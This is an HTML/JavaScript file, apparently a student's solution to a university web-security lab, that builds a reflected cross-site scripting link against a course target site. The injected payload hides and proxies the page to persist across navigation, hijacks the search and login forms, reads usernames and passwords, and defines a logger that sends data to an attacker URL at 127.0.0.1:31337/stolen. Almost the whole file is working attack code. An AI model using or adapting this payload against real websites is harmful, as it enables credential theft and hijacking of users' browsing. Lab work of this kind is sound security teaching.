xss

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. function payload(attacker) {
5.  
6. function log(data) {
7. console.log($.param(data));
8. $.get(attacker, data);
9. }
10.  
11. function loadcallback() {
12. console.log("callback called");
13.  
14. $("html").show();
15.  
16. $('#bungle-lnk').removeAttr("href");
17. $('#bungle-lnk').click(function() {
18. proxy('/', history.state['url'] != '/', false);
19. });
20.  
21. $('#search-again-btn').removeAttr("href");
22. $('#search-again-btn').click(function() {
23. proxy('/', true, false)
24. });
25.  
26. $('.history-item').each(function() {
27. var value = $(this).attr('href');
28. $(this).removeAttr('href');
29. $(this).click(function () {
30. proxy(value, true, false);
31. });
32. });
33.  
34. // hijack search form
35. $('#search-btn').click(function(e) {
36. e.preventDefault();
37. var attr = $("#query").val();
38.  
39. // log to attacker
40. console.log("search clicked");
41.  
42. // fill in page
43. $.ajax({
44. url: "./search",
45. data: {
46. q: attr
47. },
48. type: "GET",
49. success: function (data) {
50. $("html").html(data);
51. proxy("search?q=" + attr, true, false);
52. }
53. });
54. });
55.  
56. $('#log-in-btn').click(function(e) {
57. e.preventDefault();
58. var un = $('#username').val();
59. var pw = $('#userpass').val();
60.  
61. //TODO: log to attacker
62. console.log("btn clicked: " + un + ", " + pw);
63.  
64. $.ajax({
65. url: "./login",
66. data: {
67. username: un,
68. password: pw,
69. },
70. type: "POST",
71. success: function (data) {
72. $("html").html(data);
73. proxy("/", false, false);
74. }
75. });
76. });
77. }
78.  
79. function proxy(href, shouldPush, useHistory) {
80. console.log('proxy called');
81.  
82. // add appropriate url to the history stack
83. if (shouldPush) {
84. $("html").load(href, function() {
85. loadcallback();
86. history.pushState({url: href, html: $("html").html()}, "", href);
87. });
88. }
89.  
90. else {
91. if (useHistory) {
92. $("html").html(history.state["html"]);
93. }
94. loadcallback();
95. }
96. }
97.  
98. // do this on first injection
99. $("html").hide();
100. $(document).ready(function() {
101.  
102. // load script to the page
103. var script = document.createElement('script');
104. script.type = "text/javascript";
105. script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
106. $("html").append(script);
107.  
108. // popstate hander
109. window.onpopstate = function(e) {
110. proxy(e.state['url'], false, true);
111. };
112.  
113. // initial history and page setup
114. history.replaceState(null, "", "/"); // avoid flashing link
115. $("html").load("/", function() {
116. loadcallback();
117. history.replaceState({url: "/", html: $("html").html()}, "", "/");
118. });
119. });
120. }
121.  
122. function makeLink(xssdefense, target, attacker) {
123. if (xssdefense == 0) {
124. return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
125. } else { // Implement code to defeat XSS defenses here.
126. }
127. }
128. var xssdefense = 0;
129. var target = "http://cos432-assn3.cs.princeton.edu/";
130. var attacker = "http://127.0.0.1:31337/stolen";
131. $(function() {
132. var url = makeLink(xssdefense, target, attacker);
133. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
134. });
135. </script>
136. <h3>parse error</h3>